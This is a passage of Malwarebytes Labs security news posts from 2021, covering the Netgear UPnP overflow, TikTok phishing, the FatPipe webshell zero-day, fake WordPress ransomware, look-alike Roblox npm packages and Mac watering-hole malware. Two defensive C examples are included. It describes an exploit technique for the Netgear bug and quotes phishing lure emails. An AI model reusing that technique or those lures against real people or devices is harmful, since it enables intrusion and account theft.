  4. The hooking DLL was created with the help of MS Detours, and based on the following template

The writeup contest results

All 6 solutions turned out to be of very high quality, so it was extremely hard to select winners. Even with some objective criteria for judging the writeups, all authors covered most of the points we wanted to see described, and the margin between the scores was small. That’s why we decided to reward all of them with Malwarebytes swag.

Additionally, we decided to single out the three most comprehensive solutions, which will be rewarded with the main prize (an IT-related book of the contestant’s choice):

  • rainbowpigeon [ writeup ] – clear explanation of the stages, elegance and simplicity of the taken approaches
  • Matthieu Walter (@matth_walter) [ writeup ] – detailed explanation of each level, easy to follow even for a person who didn’t solve the crackme themselves
  • Leow00 [ writeup ] – for the efforts to provide an educational value: detailed explanations, diagrams

All the authors will be contacted soon!

Once again thank you for participating, and hopefully see you again next year!

The post Malwarebytes CrackMe – contest summary appeared first on Malwarebytes Labs.

Update now! Netgear vulnerability patched

Netgear has released a fix for a vulnerability on several of their product models. The affected product models include extenders, routers, air cards, and modems.

The vulnerability was discovered by researchers at GRIMM, but prior to the planned disclosure date, Netgear released a patch that fixed the underlying bug in one of the affected devices.

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed under CVE-2021-34991 and described as a vulnerability that allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400v2 1.0.4.106_10.0.80 routers. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the UPnP service, which listens on TCP port 5000 by default. When parsing the universally unique identifier (uuid) request header, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root.

The vulnerability received a CVSS score of 8.8 out of 10 because of some limiting factors. One consolation in the above is that the attacker already has to be inside the LAN to perform this attack. But once they are, the attacker can send a specially crafted header to the UPnP daemon and can remotely run code with root privileges on the affected device.

Another limiting factor for the attacker lies in the fact that the copy function which overflows the stack is a string copy. As such, it will stop copying characters when it encounters a NULL character. Thus, the exploit cannot include gadgets with NULL bytes. All of the addresses within the UPnPd daemon contain a NULL character as the Most Significant Byte (MSB). But, the researchers that discovered this vulnerability created a Proof-of-Concept (PoC) which bypasses this limitation by omitting the gadget’s MSB in the payload, and then immediately ends the payload. The string copy which overflows the stack will automatically NULL terminate the string, and thus write a single NULL byte. However, this technique has the disadvantage that it can only write a single NULL byte at the end of the payload. As such, the exploit can only run a single gadget via this technique.
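As an added illustration, constructed for this page rather than taken from Netgear’s firmware or GRIMM’s research, here is the copy pattern the advisory describes next to a bounded, validating version. The buffer size, the canonical 36-character UUID layout, and the sample header values are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumption: the daemon expects a canonical UUID string, which is 36
   characters laid out as 8-4-4-4-12 hex digits separated by dashes. */
#define UUID_STR_LEN 36

/* Bounded length scan: never reads more than max_len bytes of s. */
static size_t bounded_len(const char *s, size_t max_len)
{
    size_t n = 0;
    while (n < max_len && s[n] != '\0')
        n++;
    return n;
}

/* True if the first len bytes of s form a well-formed canonical UUID. */
static bool is_canonical_uuid(const char *s, size_t len)
{
    if (len != UUID_STR_LEN)
        return false;
    for (size_t i = 0; i < len; i++) {
        bool dash_slot = (i == 8 || i == 13 || i == 18 || i == 23);
        if (dash_slot ? s[i] != '-' : !isxdigit((unsigned char)s[i]))
            return false;
    }
    return true;
}

/*
 * The pattern the advisory describes, shown only as a comment: a string copy
 * of a client-controlled header value into a fixed-size stack buffer with no
 * length check, so any value longer than the buffer overwrites the stack.
 *
 *     char uuid[UUID_STR_LEN + 1];
 *     strcpy(uuid, header_value);   // length of header_value never checked
 */

/*
 * Hardened form: measure with an upper bound, reject anything that does not
 * fit or is not shaped like a UUID, and only then copy. Returns 0 when the
 * value is accepted (out is NUL-terminated) and -1 when it is rejected.
 */
int copy_uuid_header(const char *header_value, char *out, size_t out_size)
{
    if (header_value == NULL || out == NULL || out_size == 0)
        return -1;
    /* Capping the scan at out_size means an oversized or unterminated value
       can neither be read past the destination size nor copied into it. */
    size_t len = bounded_len(header_value, out_size);
    if (len >= out_size || !is_canonical_uuid(header_value, len))
        return -1;
    memcpy(out, header_value, len);
    out[len] = '\0';
    return 0;
}

/* Wrapper with the kind of fixed stack buffer a daemon would use:
   returns 0 if the header value is accepted, -1 if it is rejected. */
int check_uuid_header_value(const char *header_value)
{
    char uuid[UUID_STR_LEN + 1];
    return copy_uuid_header(header_value, uuid, sizeof uuid);
}

int main(void)
{
    /* Constructed inputs: one well-formed UUID and one oversized value. */
    const char *good = "123e4567-e89b-12d3-a456-426614174000";
    const char *oversized =
        "123e4567-e89b-12d3-a456-426614174000-AAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    printf("good:      %s\n", check_uuid_header_value(good) == 0 ? "accepted" : "rejected");
    printf("oversized: %s\n", check_uuid_header_value(oversized) == 0 ? "accepted" : "rejected");
    return 0;
}
```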

UPnP

Universal Plug and Play (UPnP) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points, and mobile devices, to seamlessly discover each other’s presence on the network and establish functional network services. By design, the daemon accepts requests from unauthenticated clients that want to receive updates when the UPnP configuration of the network changes. For example, the Xbox One uses UPnP to configure the port forwarding necessary for gameplay.

The eternal dilemma

UPnP is a convenient way of allowing gadgets to find other devices on your network and, if necessary, modify your router to allow for device access from outside of your network. A UPnP client can obtain the external IP address of your network and add new port forwarding mappings as part of its setup process.

This is extremely convenient from a consumer perspective as it makes it a lot easier to set up new devices. Unfortunately, with this convenience have come multiple vulnerabilities and large-scale attacks which have exploited UPnP.

Very often, security issues arise from developers’ inclination to make things easier for their users. It seems the balance between security and ease of use is impossible to find. It should not be so hard to make security the default, and if the user wants more convenience there should be an option to enable it temporarily. Why would you have to open the floodgates permanently just to let one boat in?

Affected devices

No list of affected devices will be complete, because some organizations, and ISPs in particular, have a habit of rebranding routers and other network equipment. But a list of product models and the required firmware versions can be found in the Netgear security advisory.

How to make sure you are safe

Netgear strongly recommends that you download the latest firmware as soon as possible.

  1. Visit Netgear Support.
  2. Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears. If you do not see a drop-down menu, make sure that you enter your model number correctly, or select a product category to browse for your product model.
  3. Click Downloads.
  4. Under Current Versions, select the first download that begins with Firmware Version.
  5. Click Release Notes.
  6. Follow the instructions in the firmware release notes to download and install the new firmware.

For cable products, new firmware is released by your Internet service provider after NETGEAR releases it to them. Firmware fixes for the following cable products have been released to all service providers:

  • CAX80

Stay safe, everyone!

The post Update now! Netgear vulnerability patched appeared first on Malwarebytes Labs.

Phishers target TikTok influencers with verification promises and copyright threats

Influencers on TikTok are feeling the pinch of scams and phishing thanks to targeted campaigns hungry for fresh logins.

The phishing campaigns make use of much older tactics seen across multiple platforms down the years. It’s a one-two combo of “Do this quickly, or else something bad will happen”, combined with the lure of increased social status for someone’s social media accounts. Shall we take a look?

“Support – copyright” mails go for the panic approach

People don’t want to lose their account due to accidental (or even deliberate) copyright infringement. Social media has a weird knife-edge of appearing to be a free for all, while routinely dinging accounts for copyright. Most platforms operate a sort of “three strikes and you’re out” policy. In this case, the scammers (who include a special kind of phishing link in the mail – more on this later) don’t waste any time:

Hi dear user,

Your account violates our copyright. Your account will be deleted from copyright within 48 hours, will not be re-entered if you think this is an error and you do not want your account deleted please reply to this email with “Confirm my account”. Copyright is very important to us. If necessary actions are not taken from our connection, you will be removed from our servers within 48 hours. Please do not change your password while your account is being examined.

There’s a veritable word salad bulging out of every other sentence. I’ve highlighted the important part in bold. They don’t want victims changing logins until they’ve taken full control of the account. This is a well-worn tactic in 419-style scams, where the perpetrator warns the victim that whatever they’ve promised them will take a few days to happen. Definitely don’t tell anyone, or change details, or do anything else. They claim they’re taking care of it behind the scenes. In reality, they’re just stealing the account, safe in the knowledge that the victim is busy doing nothing to prevent this from happening.

Verification woes

Getting a verification stamp on your social media profile is seen as a “special” form of status. We’ve seen years of scams along these lines for Twitter, where the promise of getting a checkmark results in account theft or even monetary loss.

It’s much the same thing here:

Hi dear user,

The account caught our attention and we examined the account. We saw that he shared his own original content. We offer the right to receive a verified badge for your account.

To get a verified badge for your account, you must identify that you are the real owner of the account. We will give you a form to verify that you are the true owner of the account.

To receive the verification form for your account, reply to this email by typing “verify my account”.

This is even more of a word salad than the original mail, but people still fall for it. You’re probably wondering what the “special kind of phishing link in the mail” is all about, right? Well, I’m glad you asked…

The special kind of phishing link in the mail

Scams like this typically send you to a phishing page. It might be well designed, it could be a mess, but a phishing page you shall have.

Not this one, however. They’re trying something a little fresher.

Scammers are wising up to the fact that folks may be using additional forms of authentication to protect their accounts. An easy way for them to combat this is to direct victims to WhatsApp chat rooms instead. From there, they can start asking for phone numbers, email addresses and (importantly) the 6-digit 2FA code sent to the mobile.

While the victim waits in chat, the scammers are busy punching in the login and 2FA code to hijack their account in real time. At the moment, it seems nobody knows for sure if the idea here is eventual extortion, a bit of “fun” trolling, selling the accounts on, or something else altogether. But whether your account is geared towards influencing or you just use TikTok for fun, it pays to lock things down and make use of TikTok’s security settings.

TikTok users are popular targets for people up to no good. You don’t want the hassle of trying to recover stolen accounts via customer support, especially as many organisations continue to be impacted thanks to the pandemic. Be cautious, have fun, and keep those accounts free from harm.

The post Phishers target TikTok influencers with verification promises and copyright threats appeared first on Malwarebytes Labs.

Patch now! FatPipe VPN zero-day actively exploited

According to its marketing team, a FatPipe MPVPN can make your VPN “900% more secure.” Well, I don’t know about that, but I do know a way to make your MPVPN admin console 100% more secure, and that you should do so right away, by installing the latest version of its software.

Why? Because older versions of the device software used by FatPipe’s MPVPN, WARP, and IPVPN products are all vulnerable to a serious zero-day exploit that has been actively exploited in the wild for at least six months. FatPipe advises that versions 10.1.2r60p93 and 10.2.2r44p1 of its software, or later, are the ones you need.

If you are unable to update immediately, FatPipe recommends you cut off access to your admin console from the Internet at large: “disable UI access on all the WAN interfaces or configure Access Lists on the interface page to allow access only from trusted sources.”

The vulnerability

Like a lot of security and administration software, FatPipe’s MPVPN is configured and controlled through a web-based administration portal, which is just another way of saying “website”.

FatPipe describes the vulnerability in its software’s administration website as a “lack of input and validation checking mechanisms for certain HTTP requests”. It goes on to say “an attacker could exploit this vulnerability by sending a modified HTTP request to the affected device”.

That simple POST request could “allow a remote attacker to upload a file to any location on the filesystem on an affected device.” But FatPipe says could, and the FBI says did. According to the agency, a recent forensic analysis has revealed that Advanced Persistent Threat (APT) actors (plural) have been abusing the flaw since May 2021.

Input validation is website security 101, and the attack as described by the FBI is very simple. The Persistent Threat groups that carried out the attacks may have been Advanced, but the exploit they used was not.

The exploitation

The FBI says that “The vulnerability allowed APT actors to gain access to an unrestricted file upload function to drop a webshell for exploitation activity with root access, leading to elevated privileges and potential follow-on activity.”

There’s a lot going on in that one sentence. Let’s break down what it means:

The FBI says the APT groups gained access to an “unrestricted file upload function,” meaning that the attackers were able to add files to a server running the admin console for some FatPipe software. Attackers should obviously not be able to simply add their files to your servers.

For this attack to work, the APT actors only needed to add one file: A web shell, at /fpui/img/1.jsp. A web shell is a type of malicious script that turns an attacker’s ability to add a file to your server into an ability to do whatever they want on your server. The attackers simply send the web shell the commands they’d like your machine to run, and it runs them.

The shell can only run with whatever restricted permissions it inherits from the web server it’s added to, but in this case it seems as if there were no restrictions. The FBI’s description suggests that the web shell enjoyed root-level (administrator) access from the get go.

Free to do whatever they wanted with their web shells, the attackers opted to overwrite the machines’ Secure Shell (SSH) configuration, so they could use the same method of remote access as the machine’s legitimate administrators. The FBI says the APT groups then used the compromised FatPipe servers as bridgeheads to “route malicious traffic through the device and target additional U.S. infrastructure”.

If you want to check your system for signs of exploitation, the FBI alert contains a full list of Indicators of Compromise (IoCs). It also notes that the APT actors were careful to clean up after themselves, and so the agency would love to hear from you if you can add anything to its understanding of these attacks.

What is going on with security admin software?

It is a shock, but not a surprise, to read about an easily exploited flaw in an Internet-facing administration console for a security product in 2021. A shock because the whys and wherefores of securing websites—and the central importance of treating any kind of input as hostile unless proven otherwise—has been very well understood for decades. But it’s not a surprise because criminals exploiting basic flaws like authentication bypasses or input validation errors in security products like VPNs has been a running theme for several years now.

In a recent episode of Malwarebytes’ Lock and Code podcast, host David Ruiz interviewed Victor Gevers, chair of the Dutch Institute for Vulnerability Disclosure (DIVD), about July’s enormous Kaseya ransomware attack. Gevers explains that his team had been racing against time to get several zero-day vulnerabilities in Kaseya VSA fixed at the time of the attack, and that one of those zero-days was in fact used by the ransomware gang.

Gevers also revealed that the problems his team discovered in Kaseya VSA were not unusual. The vulnerabilities were uncovered during a much broader investigation which revealed a worrying trend—that Internet-facing remote administration tools are rife with flaws.

You can learn more about what Gevers and his team discovered in the podcast episode below.


The post Patch now! FatPipe VPN zero-day actively exploited appeared first on Malwarebytes Labs.

Fake ransomware warnings hit WordPress sites: How to stay safe

A ransomware warning has appeared out of nowhere and started taking over WordPress sites.

The warning, with its black background and red writing, says:

“SITE ENCRYPTED

{ Countdown }

FOR RESTORE SEND 0.1 BITCOIN:

[address redacted]

(create file on site /unlock.txt with transaction key inside)”

Ransomed website

But there’s just one thing… the warning is a fake. There is no ransomware.

The ransomware that isn’t what it claims to be

The warning is clearly intended to scare the site owner into paying the 0.1 Bitcoin ransom, which was worth roughly $6,000 at the time of writing. The countdown clock adds to the intimidation.

Researchers at Sucuri found and analyzed the fake ransomware. When they performed an on-site scan for a file that contained the bitcoin address, they found that the ransomware alert was merely an HTML page that displays the notice and a PHP script that accounts for the timer.

WordPress

WordPress is one of the most popular content management systems (CMS), if not the most popular. Of course, this also makes it a primary target for anyone looking to compromise websites. WordPress is an open-source CMS, meaning its source code is public so that anyone can inspect, modify, and enhance it. This has resulted in a great many available plugins to add to sites that perform all kinds of tasks, from stopping spammers to incorporating special smileys. You name it, there is a plugin for it.

Unfortunately, not all these plugins have the same level of security, and some even have an ulterior, malicious motive. In this case, it looks as if files were added into the directory of an already present plugin.

Removing the infection

Once the infection was found, it turned out to be easy to remove. All victims had to do was find the file with the bitcoin address in it and delete it. In this case it was the file /wp-content/plugins/directorist/directorist-base.php. Directorist is the name of a legitimate plugin intended to create lists of directories based on location, category, and other interests.

By backtracking changes and looking at the access logs, the researchers found that it is very likely the legitimate plugin was already installed on the website and later tampered with by the attackers. While it was clear that the attacker must have had administrator level access, it is unclear whether they had brute forced the admin password or had acquired the already-compromised login from the black market.

Restoring the website

Deleting the file removed the ransom notice, but it also left the researchers with a lot of 404 Not Found responses to internal links on the website. As it turned out, the fake ransomware included a basic SQL command which finds any posts and pages with the “publish” status and changes them to “null”. All the content was still in the database, just unable to be viewed!

Website administrators can undo this effect by using another simple SQL command.

UPDATE `wp_posts` SET `post_status` = 'publish' WHERE `post_status` = 'null';

Please note that this command will also bring back some content that you may have removed yourself, but at least it will bring back all the content that the plugin made invisible.

Under development?

The researchers found indications of a file called azz_encrypt.php in the directorist directory, but were unable to find the file actually present on any of the infected websites they looked at. So this CMS hijack may be a work in progress that aims to do some actual encryption at one point.

How to protect your WordPress site

If you are running a website, you do not need scares like this one. Besides a possible loss of revenue, it brings in extra work. So what can you do to keep your WordPress site safe?

  • When using a CMS, and especially a popular one, you need to keep an eye out for updates—for both the CMS itself and any plugins you have installed. Speed is important, so patch as soon as you are able. Attackers are always aware of the latest vulnerabilities and will scan the Internet for unpatched sites to hijack, sometimes within hours of a patch being made available.
  • Create backups regularly (there are plugins for that). If you find out an intruder made changes to your website, it makes things a lot easier for you if you have a recent backup that you can restore without losing too much work, and without having to comb through every piece of code to check if anything else has been tampered with.
  • Choose your plugins wisely.
  • Think about access management. Consider who you allow to make changes to your site, and to what level.
  • Use secure passwords (and preferably 2FA).
  • Be wary of SQL injection.
  • If you allow uploads, limit the type of files to non-executables and monitor them closely.
  • For websites that require even more security, there are specialized vulnerability scanners and application firewalls that you may want to look into. This is especially true if you are a popular target for people that would love to deface or abuse your website.
  • If the CMS is hosted on your own servers, be aware of the dangers that this setup brings. Remember that you are relying on open-source code. Running it on your own servers should be met with special precautions to keep it separated from other work servers.

Stay safe, everyone!

The post Fake ransomware warnings hit WordPress sites: How to stay safe appeared first on Malwarebytes Labs.

Bogus JS libraries become sustained ransomware threat for Roblox gamers

If your kids play Roblox, you may wish to warn them of ransomware perils snapping at their heels. A very smart, and determined attack has been taking place for a little while now. Although initially dismissed as a form of prank, the developers under fire now disagree. Whether prank or malicious campaign, the end results are still bad for everyone involved. Shall we take a look?

What is Roblox?

If you have younger kids and they play games, they may well have dabbled in Roblox. If so, you’ll have experienced howls of outrage for a few days in October when the entire system came crashing down.

It’s a game, but also much more than that. It’s a place where other users can make their own games inside the Roblox landscape. It’s been around since 2006, and has millions of users. Kids love it because every time they log in, there’ll be something different to do. If they start making content, there’s even the possibility of making money from it.

As you can imagine, this makes it a popular target for scammers and malware authors. As they’re primarily targeting kids, it’s probably a bit easier to go on the offensive than tackling more cautious adults.

What tactics are used to scam Roblox users?

Glad you asked! We covered one such scam last year. Robux is the in-game currency used by players. It can be bought with real money, or earned via creating content (assuming the child is over 13 years of age).

As a result, Robux cash generators are rife and will send gamers off to bogus surveys, malware installs, phish attempts…the usual collection of awfulness.

Outside of Robux generators, phishing and malware generally are popular with scammers everywhere. You can read about typical Roblox experiences here. Not everything is scam central; some of it is just weird, or baffling. Even so, it pays to be on your guard. This is especially applicable in this case. We don’t “just” have scammers targeting the kids directly. What we have here is people trying to place bogus files in locations the players wouldn’t necessarily expect to find them.

We now turn our attention to Noblox, the stepping-stone for scammers to reach their goal of the end users.

Roblox and Noblox

Noblox is a popular way to automate certain in-game Roblox functions. As per its description:

This NPM package enables operations from the Roblox website to be executed via NodeJS; many individuals leverage noblox.js alongside Roblox’s HTTPService to create in-game scripts that interact with the website, i.e. promote users, shout events, and so on, or to create Discord utilities to manage their community.

Malicious packages containing ransomware were found to be emulating the real thing.

Noblox.js-proxy imitated noblox.js, deliberately using a name as similar as possible. Meanwhile, Noblox.js-proxies did the same thing to the legitimate noblox.js-proxied. The bad packages had a few hundred downloads between them before being shut down.

The scammers reused certain portions of the real thing, and then dropped dubious code into places users wouldn’t suspect. A little bit of obfuscated code later, and the end result is Trojans dropped onto the target PC, alterations to the Windows registry, and a dash of ransomware to round the whole sorry enterprise off.
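An added example, not part of the original post or of the noblox.js project: a small allowlist check in C that flags dependency names shaped like the look-alikes described above, either a known name with a suffix bolted on (noblox.js-proxy against noblox.js) or a name within a couple of edits of a known one (noblox.js-proxies against noblox.js-proxied). The allowlist, the edit-distance threshold and the suffix separators are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed allowlist of package names the project actually depends on. */
static const char *const KNOWN[] = { "noblox.js", "noblox.js-proxied" };
#define NKNOWN (sizeof KNOWN / sizeof KNOWN[0])

/* Assumption: names this close to a known name deserve a second look. */
#define MAX_EDITS 2

/* Levenshtein edit distance using two rolling rows. Returns SIZE_MAX on
   allocation failure so the caller treats the name as not-similar. */
static size_t edit_distance(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    size_t *prev = malloc((lb + 1) * sizeof *prev);
    size_t *cur  = malloc((lb + 1) * sizeof *cur);
    if (prev == NULL || cur == NULL) {
        free(prev);
        free(cur);
        return SIZE_MAX;
    }
    for (size_t j = 0; j <= lb; j++)
        prev[j] = j;
    for (size_t i = 1; i <= la; i++) {
        cur[0] = i;
        for (size_t j = 1; j <= lb; j++) {
            size_t cost = (a[i - 1] == b[j - 1]) ? 0 : 1;
            size_t del = prev[j] + 1;
            size_t ins = cur[j - 1] + 1;
            size_t sub = prev[j - 1] + cost;
            size_t m = del < ins ? del : ins;
            cur[j] = m < sub ? m : sub;
        }
        size_t *tmp = prev;
        prev = cur;
        cur = tmp;
    }
    size_t d = prev[lb];
    free(prev);
    free(cur);
    return d;
}

enum verdict { PKG_KNOWN, PKG_SUSPICIOUS, PKG_UNKNOWN };

/* PKG_KNOWN for an exact allowlist hit; PKG_SUSPICIOUS when the name is a
   known name plus a separator and suffix, or within MAX_EDITS of a known
   name; PKG_UNKNOWN for anything else (unrelated to the allowlist). */
enum verdict classify_package(const char *name)
{
    for (size_t i = 0; i < NKNOWN; i++)
        if (strcmp(name, KNOWN[i]) == 0)
            return PKG_KNOWN;
    for (size_t i = 0; i < NKNOWN; i++) {
        size_t kl = strlen(KNOWN[i]);
        if (edit_distance(name, KNOWN[i]) <= MAX_EDITS)
            return PKG_SUSPICIOUS;
        /* Known name used as a prefix, e.g. "noblox.js" + "-proxy". */
        if (strncmp(name, KNOWN[i], kl) == 0 &&
            (name[kl] == '-' || name[kl] == '.' || name[kl] == '_'))
            return PKG_SUSPICIOUS;
    }
    return PKG_UNKNOWN;
}

int main(void)
{
    /* Constructed dependency list mixing the real names and the look-alikes. */
    const char *deps[] = { "noblox.js", "noblox.js-proxied", "noblox.js-proxy",
                           "noblox.js-proxies", "express" };
    static const char *const label[] = { "known", "SUSPICIOUS", "unknown" };
    for (size_t i = 0; i < sizeof deps / sizeof deps[0]; i++)
        printf("%-18s %s\n", deps[i], label[classify_package(deps[i])]);
    return 0;
}
```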

When “pranks” start to get serious

This one was arguably well beyond the prank point and had at least one foot in serious territory. A feeling now compounded as the Noblox devs flag at least 6 different libraries aiming to confuse and trap unsuspecting victims.

Although the bogus libraries are being taken offline, the people behind this are making use of Discord to cause additional headaches. Multiple servers exist and are being used to trick younger users into downloading the rogue files. Regular readers will be familiar with the type of Discord messages used for these sorts of antics.

What can Roblox gamers do to avoid these attacks?

As many of the bogus files are being sent in Discord, gamers should be very cautious around anything sent their way. These rogue messages may be sent via DM or posted publicly in a Discord server. They could also arrive via other methods. It’s a tricky one to address, because we’re dealing with younger users who may not be massively tech savvy, versus a confusing selection of package repositories and somewhat technical file names.

If you’re a parent and unsure about your kid’s activity in Roblox, and want to know more about it generally, a good place to start is the Roblox Parents’ Guide. If your kids are making their own games and want to branch out into the kind of package assistance seen above, it may be worth reading the FAQs from the developers. This isn’t a problem that’s likely to go away overnight, and that’s what the scammers and malware authors are banking on.

The post Bogus JS libraries become sustained ransomware threat for Roblox gamers appeared first on Malwarebytes Labs.

New Mac malware raises more questions about Apple’s security patching

Apple’s reputation on security has been taking a beating lately. As mentioned in some of our previous coverage, security researcher Joshua Long recently shone a light on problems with Apple’s security patching strategy. His findings showed a shocking number of cases where Apple patched a vulnerability, but did not do so in all of the vulnerable system versions. Often, systems older than the most current one were left in vulnerable states.

In theory, this could lead to attacks on those vulnerable systems. And new Mac malware that was disclosed on Thursday provides a concrete example of why this is not just theory.

Watering hole campaign discovered by Google

Google’s Threat Analysis Group (TAG) discovered a watering hole campaign in Hong Kong, targeting journalists and pro-democracy political groups. This campaign was using two macOS vulnerabilities to infect Macs that simply visited the wrong web page.

A watering hole attack is one that’s deployed through a website that the desired target is likely to visit, so named because of the way predators will hide near a watering hole that is frequented by their prey.

The vulnerabilities were used to drop malware onto the computer silently, without the user needing to click on anything or even being aware that anything has happened. The malware itself is a pretty full-featured backdoor, but what is most remarkable about it is not its capabilities. This malware has been in the wild, with very few changes, since at least 2019. Back then, it was distributed as a trojan, in an installer disguised as – you’ll never guess – an Adobe Flash Player installer!

Fake Adobe Flash Player installer used to install the malware (the window shows the messages “Prompt” and “Installation is successful” in Chinese, with a button labeled “Confirm” in Chinese)

Some of the executable files dropped by this installer from 2019 are nearly the same as the ones currently in distribution, but were (as of Thursday) still undetected by any antivirus software.

The vulnerabilities had been fixed… sort of

The first vulnerability used by the malware was CVE-2021-1789, which was a remote code execution (RCE) vulnerability in WebKit. This means that it allowed an attacker to trick WebKit – the foundation of Safari and a number of other browsers – into executing arbitrary code, which is not supposed to be possible.

The second vulnerability, CVE-2021-30869, was a privilege escalation bug. This means that it could be used to run arbitrary code with the highest level of permissions possible when it should not actually have that level of access.

The first of these was patched on February 1, with the release of macOS Big Sur 11.2 and Safari 14.0.3. The latter would have fixed the problem on macOS Catalina (10.15) and macOS Mojave (10.14), if users had upgraded to Safari 14.

The second was apparently also fixed in Big Sur 11.2, on February 1, although it was not originally mentioned in the release notes. Mention of the fix was added on September 23, after Google alerted Apple to the issue and on the same day Apple released Security Update 2021-006 Catalina, to fix the issue in macOS Catalina.

Entry for CVE-2021-30869 added on September 23, 2012

Catalina wasn’t fixed for more than seven months?!

Yes, you heard that right. Apple knew about the vulnerability long before, and fixed it in macOS Big Sur, after the team who found it, Pangu, alerted Apple of the issue. Pangu went on to present their findings in April at the Zer0con security conference.

However, the same bug apparently existed in Catalina, which remained unpatched seven months after Apple released the patch for Big Sur, and more than five months after the details had been released at Zer0con. This allowed attackers to target individuals running Catalina and Safari 13 without detection. (According to TAG, more than 200 machines may have been targeted for infection at the time it discovered the campaign.)

There’s a lot that’s unclear about why this might have happened. Did Apple know that the bug affected Catalina, but chose not to patch it? Was the bug superficially different in Catalina, and thus was missed in a cursory investigation? Or was the bug completely different, but resulted in the same vulnerability? Only Apple could say.

I do find it highly suspicious that mention of this fix was left off of the Big Sur 11.2 release notes, and then added at the end at the same time the bug was fixed in Catalina. That would seem to suggest that it’s something that Apple already knew should have been fixed, or very quickly identified as being the same as the Big Sur bug.

Takeaways

There are a couple of things that this incident illustrates quite plainly. First, this throws further weight behind what Joshua Long has taught us: that Apple can only be relied on to patch the absolute latest version of macOS, which is currently macOS Monterey (12). If you are using an older system, you do so at your own risk.

I personally have an older machine still on macOS Mojave, because upgrading to anything newer means I’d lose access to all my old 32-bit Steam games. However, since I’m aware that that system can no longer be considered secure, I limit what I do with it. Any web browsing and other online activities are done with my up-to-date devices, and since I’ve recently migrated to a newer machine, I’ll soon remove my personal data from the Mojave machine.

Second, the fact that this malware went undetected since at least 2019 is, unfortunately, a repeating pattern. There has been a lot of very tightly targeted nation state malware affecting Mac users, and because of the very limited number of victims, it’s hard to detect. Those managing business environments would do well to use some kind of EDR or other monitoring software, but what is an average person to do with their personal Macs?

Some steps you can take to avoid this kind of malware would include:

  • Keep your system and all your software fully up to date
  • Be conscious of everything you open on your computer, and be sure you know exactly what it is before you do so
  • Never install Adobe Flash Player, whether you think it’s legitimate or not!
  • Use an ad blocker (malicious ads can be a source of malware) and some kind of protection against malicious sites, such as the free Malwarebytes Browser Guard
  • If you engage in any “risky” activities, consider doing them from a burner device with no access to your data, such as a cheap Chromebook
  • If you are a potential target of a hostile nation-state – such as a journalist or human rights activist critical of an oppressive regime, or a member of a group persecuted by a government (such as the Uyghur people in China) – consider consulting with a security professional

Malwarebytes for Mac detects this malware as OSX.CDDS.

The post New Mac malware raises more questions about Apple’s security patching appeared first on Malwarebytes Labs.